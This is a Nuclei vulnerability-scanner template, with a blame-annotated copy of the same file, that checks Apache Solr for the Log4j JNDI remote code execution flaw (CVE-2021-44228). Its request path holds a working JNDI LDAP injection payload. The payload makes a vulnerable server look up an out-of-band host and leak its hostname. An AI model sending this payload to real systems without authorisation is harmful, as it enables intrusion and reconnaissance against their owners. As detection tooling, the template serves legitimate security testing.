nuclei-templates/vulnerabilities/apache/apache-solr-log4j-rce.yaml

id: apache-solr-log4j-rce

info:
  name: Apache Solr Log4j JNDI RCE
  author: Evan Rubinstein,nvn1729
  severity: critical
  description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.
  reference:
    - https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228
    - https://twitter.com/sirifu4k1/status/1470011568834424837
    - https://github.com/apache/solr/pull/454
  tags: solr,oast,log4j,rce,apache

requests:
  - method: GET
    path:
      - "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D"

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol  # Confirms the DNS Interaction
        words:
          - "dns"

      - type: regex
        part: interactsh_request
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable

    extractors:
      - type: regex
        part: interactsh_request
        group: 1
        regex:
          - '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+'   # Print extracted ${hostName} in output
Added apache-solr-log4j RCE (#3336) * update: added apache-solr-log4j-rce Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: GitHub Action <action@github.com> 2021-12-15 15:45:43 +00:00			`id: apache-solr-log4j-rce`

			`info:`
			`name: Apache Solr Log4j JNDI RCE`
			`author: Evan Rubinstein,nvn1729`
			`severity: critical`
			`description: Apache Log4j2 <=2.14.1 JNDI features used in configuration, log messages, and parameters do not protect against attacker controlled LDAP and other JNDI related endpoints. This vulnerability affects Solr 7+.`
			`reference:`
update: added more reference 2021-12-15 15:50:18 +00:00			`- https://solr.apache.org/security.html#apache-solr-affected-by-apache-log4j-cve-2021-44228`
Added apache-solr-log4j RCE (#3336) * update: added apache-solr-log4j-rce Co-authored-by: Sandeep Singh <sandeep@projectdiscovery.io> Co-authored-by: GitHub Action <action@github.com> 2021-12-15 15:45:43 +00:00			`- https://twitter.com/sirifu4k1/status/1470011568834424837`
			`- https://github.com/apache/solr/pull/454`
			`tags: solr,oast,log4j,rce,apache`

			`requests:`
			`- method: GET`
			`path:`
			`- "{{BaseURL}}/solr/admin/collections?action=$%7Bjndi:ldap://$%7BhostName%7D.{{interactsh-url}}/a%7D"`

			`matchers-condition: and`
			`matchers:`
			`- type: word`
			`part: interactsh_protocol # Confirms the DNS Interaction`
			`words:`
			`- "dns"`

			`- type: regex`
			`part: interactsh_request`
			`regex:`
			`- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Match for extracted ${hostName} variable`

			`extractors:`
			`- type: regex`
			`part: interactsh_request`
			`group: 1`
			`regex:`
			`- '([a-z0-9\.\-]+)\.([a-z0-9]+)\.([a-z0-9]+)\.\w+' # Print extracted ${hostName} in output`